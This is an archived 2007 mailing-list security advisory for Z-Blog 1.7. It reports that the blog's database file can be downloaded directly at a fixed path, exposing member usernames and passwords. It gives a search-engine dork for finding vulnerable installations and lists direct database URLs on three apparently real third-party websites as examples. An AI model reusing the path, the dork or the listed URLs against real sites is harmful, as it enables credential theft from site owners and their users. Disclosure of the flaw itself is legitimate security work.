|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Raed
BsdMail.Com
Date: Fri Jun 01 2007 - 06:19:38 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
* Author : Hasadya Raed
* Contact : RaeDBsdMail.Com ~>Israel Hacker
* Greetz : Fairoz :)
* Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
* Script : Z-Blog 1.7
* Impact : Remote
* Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build 70216"
* Download : http://bbs.rainbowsoft.org/attachment.php?aid=92
--/ REPRODUCE \--
# Attackers Can Authentication Bypass In This Product By Add The Following Files:
('/DATA/zblog.mdb') And Download The Database Which Contains Table Named [blog_Member]
The Users Names And Passwords Inside
--/ Examples \--
http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]